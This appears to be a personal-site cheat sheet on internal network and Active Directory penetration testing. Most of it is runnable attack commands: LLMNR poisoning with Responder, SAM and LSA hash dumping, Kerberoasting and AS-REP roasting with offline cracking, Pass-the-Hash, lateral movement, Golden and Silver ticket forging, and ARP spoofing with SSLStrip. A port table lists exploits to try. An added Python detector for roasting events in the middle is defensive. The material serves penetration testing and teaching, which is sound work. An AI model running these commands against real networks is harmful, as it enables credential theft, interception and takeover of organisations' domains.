Kaique Mitsuo Silva Yamamoto
Information Security

Network Penetration Testing and Active Directory

Network enumeration, Active Directory attacks, Kerberoasting, lateral movement, LLMNR poisoning, Pass-the-Hash, BloodHound: infrastructure pentesting.

Network pentesting focuses on internal infrastructure (servers, networks, Active Directory). It is the core of corporate pentests and red team engagements.


Network reconnaissance

# Nmap: full network scan
nmap -sn 192.168.1.0/24          # Host discovery
nmap -sV -sC 192.168.1.0/24      # Service detection + scripts
nmap -p- -T4 192.168.1.0/24      # Full port scan

# Masscan: for large networks
masscan 10.0.0.0/8 -p 80,443,445,3389 --rate 10000

# ARP scan (local)
arp-scan --localnet

# Netdiscover
netdiscover -r 192.168.1.0/24

# Responder for LLMNR/NBT-NS poisoning
responder -I eth0 -dwPv
# Captures NTLMv2 hashes from Windows machines

Active Directory

Initial enumeration

# Impacket (Python toolkit for AD)
# Enumerate users
impacket-lookupsid domain/user:[email protected]

# Enumerate shares
impacket-smbclient domain/user:[email protected]

# Enumerate sessions
impacket-sessions domain/user:[email protected]

# enum4linux
enum4linux -a 192.168.1.10

# SMBMap
smbmap -H 192.168.1.10 -u user -p pass
smbmap -H 192.168.1.10 -R       # Recursive listing

# CrackMapExec (swiss army knife)
crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.0/24 -u user -p pass --shares
crackmapexec smb 192.168.1.0/24 -u user -p pass --sam    # Dump local hashes
crackmapexec smb 192.168.1.0/24 -u user -p pass --lsa    # LSA secrets

# BloodHound (visualize attack paths)
bloodhound-python -u user -p pass -d target.local -c All -dc dc.target.local
# Import the data into the BloodHound GUI
# Identify: Shortest Path to Domain Admin

Kerberoasting

# Request service tickets (SPNs)
impacket-GetUserSPNs target.local/user:pass -dc-ip 192.168.1.10 -request
# Output: TGS tickets in hashcat format

# Offline cracking
hashcat -m 13100 tickets.txt /wordlists/rockyou.txt
john tickets.txt --wordlist=/wordlists/rockyou.txt --format=krb5tgs

# Rubeus (Windows tool); the action is named "kerberoast"
.\Rubeus.exe kerberoast /outfile:hashes.txt

AS-REP Roasting

# Users that do not require Kerberos pre-authentication
impacket-GetNPUsers target.local/ -dc-ip 192.168.1.10 -request -usersfile users.txt

# Crack
hashcat -m 18200 asrep.txt /wordlists/rockyou.txt
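Defender-side counterpart to the Kerberoasting and AS-REP roasting sections above, added here as an example and not part of the original cheat sheet: both techniques leave a characteristic trace on the domain controller (event 4769 with RC4 ticket encryption for several non-machine service accounts, and event 4768 with pre-authentication type 0). Field names follow the Windows Security event log; the sample events and the burst threshold are constructed assumptions.

```python
"""Flag Kerberoasting and AS-REP roasting patterns in Windows Security events.

Added example, not from the original page. 4769 = TGS request, 4768 = TGT
request; field names match the Security log XML. Sample events are constructed.
"""
from collections import defaultdict

RC4_HMAC = "0x17"       # etype roasting tools request by default (crackable offline)
ROAST_THRESHOLD = 3     # distinct service accounts one user requests before alerting

# Constructed sample events: one normal AES request, one RC4 burst, one AS-REP roast
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@TARGET.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.1.20", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@TARGET.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@TARGET.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@TARGET.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.50", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "PreAuthType": "0",
     "IpAddress": "::ffff:192.168.1.50", "Status": "0x0"},
]

def is_roastable_tgs(ev):
    """Successful 4769 for a user (not machine, not krbtgt) service account with RC4."""
    svc = ev.get("ServiceName", "")
    return (ev["EventID"] == 4769 and ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType") == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def is_asrep_roast(ev):
    """4768 issued without pre-authentication (PreAuthType 0) and encrypted with RC4."""
    return (ev["EventID"] == 4768 and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType") == RC4_HMAC)

def detect(events, threshold=ROAST_THRESHOLD):
    """Return ({requester: sorted SPN accounts} over threshold, [AS-REP roasted accounts])."""
    per_user = defaultdict(set)
    asrep = []
    for ev in events:
        if is_roastable_tgs(ev):
            per_user[ev["TargetUserName"]].add(ev["ServiceName"])
        elif is_asrep_roast(ev):
            asrep.append(ev["TargetUserName"])
    kerberoast = {u: sorted(s) for u, s in per_user.items() if len(s) >= threshold}
    return kerberoast, asrep

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Enforcing AES-only encryption on service accounts and removing "Do not require Kerberos preauthentication" make both events disappear at the source; the detector then only fires on legacy accounts that still need fixing.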

Pass-the-Hash

# Use the NTLM hash instead of the password
impacket-psexec target.local/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:HASH

impacket-wmiexec target.local/[email protected] -hashes :HASH

impacket-smbexec target.local/[email protected] -hashes :HASH

# CrackMapExec with a hash
crackmapexec smb 192.168.1.10 -u admin -H HASH

# Evil-WinRM with a hash
evil-winrm -i 192.168.1.10 -u admin -H HASH

Lateral Movement

# PsExec (via SMB)
impacket-psexec domain/admin:[email protected]

# WMI
impacket-wmiexec domain/admin:[email protected]

# WinRM
evil-winrm -i 192.168.1.11 -u admin -p pass

# DCOM
impacket-dcomexec domain/admin:[email protected]

# RDP
xfreerdp /v:192.168.1.11 /u:admin /p:pass /dynamic-resolution

# SSH (if Linux)
ssh [email protected]

Golden/Silver Ticket

# Golden Ticket (requires the krbtgt hash)
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain target.local administrator
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass dc.target.local

# Silver Ticket (requires the service account hash)
impacket-ticketer -nthash SVC_HASH -domain-sid S-1-5-21-xxx -domain target.local -spn cifs/dc.target.local administrator

MitM Attacks

# ARP Spoofing
arpspoof -i eth0 -t 192.168.1.50 192.168.1.1    # Gateway spoof
arpspoof -i eth0 -t 192.168.1.1 192.168.1.50     # Reverse spoof

# Bettercap (swiss army knife)
bettercap -iface eth0
> net.probe on
> arp.spoof on
> net.sniff on

# SSLStrip (downgrade HTTPS)
bettercap -iface eth0
> set http.proxy.sslstrip true
> http.proxy on

# Responder (LLMNR/NBT-NS)
responder -I eth0 -dwPv
# Captures NTLMv2 hashes when Windows tries to resolve names
# Crack with hashcat:
hashcat -m 5600 ntlmv2.txt /wordlists/rockyou.txt

Servers of Interest

Port        Service        Test
21          FTP            Anonymous login, bounce attack
22          SSH            Weak creds, old versions, key reuse
25          SMTP           Open relay, user enumeration (VRFY)
53          DNS            Zone transfer, cache poisoning
80/443      HTTP/S         Web vulnerabilities (OWASP)
110/143     POP3/IMAP      Plaintext auth, mailbox access
389/636     LDAP           Anonymous bind, injection
445         SMB            EternalBlue, shares, null sessions
1433        MSSQL          Default creds, xp_cmdshell
3306        MySQL          Default creds, UDF injection
3389        RDP            BlueKeep, weak creds, clipboard
5432        PostgreSQL     Default creds, COPY TO PROGRAM
5985/5986   WinRM          Evil-WinRM access
6379        Redis          No auth, RCE via crontab
8080        HTTP alt       Admin panels, Tomcat
8443        HTTPS alt      Admin panels
9200        Elasticsearch  No auth, data exposure
27017       MongoDB        No auth, data exposure
